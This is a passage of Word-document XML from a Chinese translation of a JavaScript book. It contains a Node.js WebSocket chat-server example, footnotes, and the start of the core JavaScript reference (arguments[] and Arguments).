        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>22-17</w:t>
      </w:r>
      <w:r>
        <w:t>是一个基于</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>的聊天服务器，运行在</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>中（见</w:t>
      </w:r>
      <w:r>
        <w:t>12.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）。通过将该例和例</w:t>
      </w:r>
      <w:r>
        <w:t>18-17</w:t>
      </w:r>
      <w:r>
        <w:t>作比较，可以发现，</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>将聊天应用的服务端简化成和客户端一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>22-17</w:t>
      </w:r>
      <w:r>
        <w:t>：使用</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>的聊天服务器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>这是运行在</w:t>
      </w:r>
      <w:r>
        <w:t>NodeJS</w:t>
      </w:r>
      <w:r>
        <w:t>上的服务器端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>服务器之上</w:t>
      </w:r>
      <w:r>
        <w:t>，它运行一个</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>服务器，该服务器使用来自</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*https://github.com/miksago/node-websocket-server/</w:t>
      </w:r>
      <w:r>
        <w:t>的第三方</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>库实现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>如果得到</w:t>
      </w:r>
      <w:r>
        <w:t>"/"</w:t>
      </w:r>
      <w:r>
        <w:t>的一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求，则返回聊天客户端的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>除此之外任何</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求都返回</w:t>
      </w:r>
      <w:r>
        <w:t>404</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>协议接收到的消息都仅广播给所有激活状态的连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var http=require('http');//</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>服务器</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>ws=require('websocket-server');//</w:t>
      </w:r>
      <w:r>
        <w:t>使用第三方</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>库</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>启动阶段，读取聊天客户端的资源文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var clientui=require('fs').readFileSync("wschatclient.html");//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>服务器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var httpserver=new http.Server();//</w:t>
      </w:r>
      <w:r>
        <w:t>当</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>服务器获得一个新请求时，运行此函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>httpserver.on("request",function(request,response){//</w:t>
      </w:r>
      <w:r>
        <w:t>如</w:t>
      </w:r>
      <w:r>
        <w:t>果请求</w:t>
      </w:r>
      <w:r>
        <w:t>"/"</w:t>
      </w:r>
      <w:r>
        <w:t>，则返回客户端聊天</w:t>
      </w:r>
      <w:r>
        <w:t>UI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(request.url==="/"){//</w:t>
      </w:r>
      <w:r>
        <w:t>请求聊天</w:t>
      </w:r>
      <w:r>
        <w:t>UI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>response.writeHead(200,{"Content-Type":"text/html"});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>response.write(clientui);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>response.end();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{//</w:t>
      </w:r>
      <w:r>
        <w:t>对任何其他的请求返回</w:t>
      </w:r>
      <w:r>
        <w:t>404"</w:t>
      </w:r>
      <w:r>
        <w:t>无法找到</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>编码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>response.writeHead(404);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>response.end();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});//</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>服务器上包装一个</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>服务器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>wsserver=ws.createServer({server:httpserver});//</w:t>
      </w:r>
      <w:r>
        <w:t>当接收到一个新的连接请求的时候，调用此函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>wsserver.on("connection",function(socket){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>socket.send("Welcome to the chat room.");//</w:t>
      </w:r>
      <w:r>
        <w:t>向新客户端打招呼</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>socket.on("message",function(msg){//</w:t>
      </w:r>
      <w:r>
        <w:t>监听来自客户端的消息</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>wsserver.broadcast(msg);//</w:t>
      </w:r>
      <w:r>
        <w:t>并将它们广播给每个人</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>8000</w:t>
      </w:r>
      <w:r>
        <w:t>端口运行服务器。启动</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>服务器的时候也会启动</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>服务器</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>连接到</w:t>
      </w:r>
      <w:r>
        <w:t>http://localhost:8000/</w:t>
      </w:r>
      <w:r>
        <w:t>，并开始使用它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>wsserver.listen(8000);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>指的是独立线程运行的代码。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:bookmarkStart w:id="566" w:name="_2_"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="566"/>
      <w:r>
        <w:t>表示一直等下去。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:bookmarkStart w:id="567" w:name="_3_"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="567"/>
      <w:r>
        <w:t>下面统一称为容器。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:bookmarkStart w:id="568" w:name="_4_"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="568"/>
      <w:r>
        <w:t>Web Workers</w:t>
      </w:r>
      <w:r>
        <w:t>起初是作为</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>标准的一部分，但是后来独立成一份相近的标准。截至撰写本书时，这份标准的草案可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>http://dev.w3.org/html5/workers/</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>http://wha</w:t>
      </w:r>
      <w:r>
        <w:t>twg.org/ww</w:t>
      </w:r>
      <w:r>
        <w:t>进行访问。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:bookmarkStart w:id="569" w:name="_5_"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="569"/>
      <w:r>
        <w:t>如果指定过大就是一种浪费。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:bookmarkStart w:id="570" w:name="_6_"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="570"/>
      <w:r>
        <w:t>截至撰写本书时，</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:t>不要求权限，但是它要求启动的时候，在命令行中带上</w:t>
      </w:r>
      <w:r>
        <w:t>--unlimited-quota-for-files</w:t>
      </w:r>
      <w:r>
        <w:t>标志。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="160" w:after="160"/>
      </w:pPr>
      <w:bookmarkStart w:id="571" w:name="Di_San_Bu_Fen__JavaScriptHe_Xin_Can_Kao_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">第三部分　</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>核心参考</w:t>
      </w:r>
      <w:bookmarkEnd w:id="571"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本书的这部分是参考文档，包括</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语言核心定义的类、方法和属性。该文档根据类或者对象的名字，按照字母来排序：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251744256" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="3135701" cy="677173"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="85" name="00085.jpeg" descr="000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5.jpeg" descr="00085.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId88"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3135701" cy="677173"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>类的方法和属性都有参考页面，按照其全名的字母顺序来排列，全名包含定义该方法和属性的类名。例如，如果想阅读</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>类的</w:t>
      </w:r>
      <w:r>
        <w:t>rep</w:t>
      </w:r>
      <w:r>
        <w:t>lace()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，需要查找</w:t>
      </w:r>
      <w:r>
        <w:t>String.replace()</w:t>
      </w:r>
      <w:r>
        <w:t>，而不只是</w:t>
      </w:r>
      <w:r>
        <w:t>replace</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>核心定义了一些全局函数和属性，比如</w:t>
      </w:r>
      <w:r>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>。从技术上讲，这些是全局对象的属性。但由于全局对象没有名字，因此直接将这些属性以其非限定名列举在参考文档中。为了查阅方便，在名为</w:t>
      </w:r>
      <w:r>
        <w:t>"Global"</w:t>
      </w:r>
      <w:r>
        <w:t>的特殊参考页面，总结了</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>核心中的所有全局函数和属性（虽然并没有名为</w:t>
      </w:r>
      <w:r>
        <w:t>"Global"</w:t>
      </w:r>
      <w:r>
        <w:t>的对象或类）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="199" w:after="199"/>
      </w:pPr>
      <w:bookmarkStart w:id="572" w:name="JavaScriptHe_Xin_Can_Kao_"/>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>核心参考</w:t>
      </w:r>
      <w:bookmarkEnd w:id="572"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="573" w:name="arguments__"/>
      <w:r>
        <w:t>arguments[]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="573"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>函数参数数组</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arguments</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>arguments[]</w:t>
      </w:r>
      <w:r>
        <w:t>数组只定义在函数体中。在函数体中，</w:t>
      </w:r>
      <w:r>
        <w:t>arguments</w:t>
      </w:r>
      <w:r>
        <w:t>指代该函数的</w:t>
      </w:r>
      <w:r>
        <w:t>Arguments</w:t>
      </w:r>
      <w:r>
        <w:t>对象。该对象拥有数值属性，可当做数组来用，含有传入到该函数的所有参数。</w:t>
      </w:r>
      <w:r>
        <w:t>arguments</w:t>
      </w:r>
      <w:r>
        <w:t>标识符本质上是一个局部变量，在每个函数中会自动声明并初始化该变量。</w:t>
      </w:r>
      <w:r>
        <w:t>arguments</w:t>
      </w:r>
      <w:r>
        <w:t>仅在函数体中时才指代</w:t>
      </w:r>
      <w:r>
        <w:t>Arguments</w:t>
      </w:r>
      <w:r>
        <w:t>对象，在全局代码中为</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</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Arguments;</w:t>
      </w:r>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>章</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="574" w:name="Arguments"/>
      <w:r>
        <w:t>Arguments</w:t>
      </w:r>
      <w:bookmarkEnd w:id="574"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>函数的参数和其他属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Object→Arguments</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>arguments</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>argume</w:t>
      </w:r>
      <w:r>
        <w:t>nts[n]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Arguments</w:t>
      </w:r>
      <w:r>
        <w:t>对象只定义在函数体中。从技术上讲，</w:t>
      </w:r>
      <w:r>
        <w:t>Arguments</w:t>
      </w:r>
      <w:r>
        <w:t>对象不是数组，但它拥有数值属性和</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性，数值属性可当做是数组元素，</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性则表示数组元素的个数。这些数组元素是传递给该方法的参数值。元素</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>是第一个参数，元素</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>是第二个参数，以此类推。所有作为参数传入的值都会成为</w:t>
      </w:r>
      <w:r>
        <w:t>Arguments</w:t>
      </w:r>
      <w:r>
        <w:t>对象的数组元素，即便在函数声明中没有指定参数名。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>callee</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>指代当前正在执行的函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
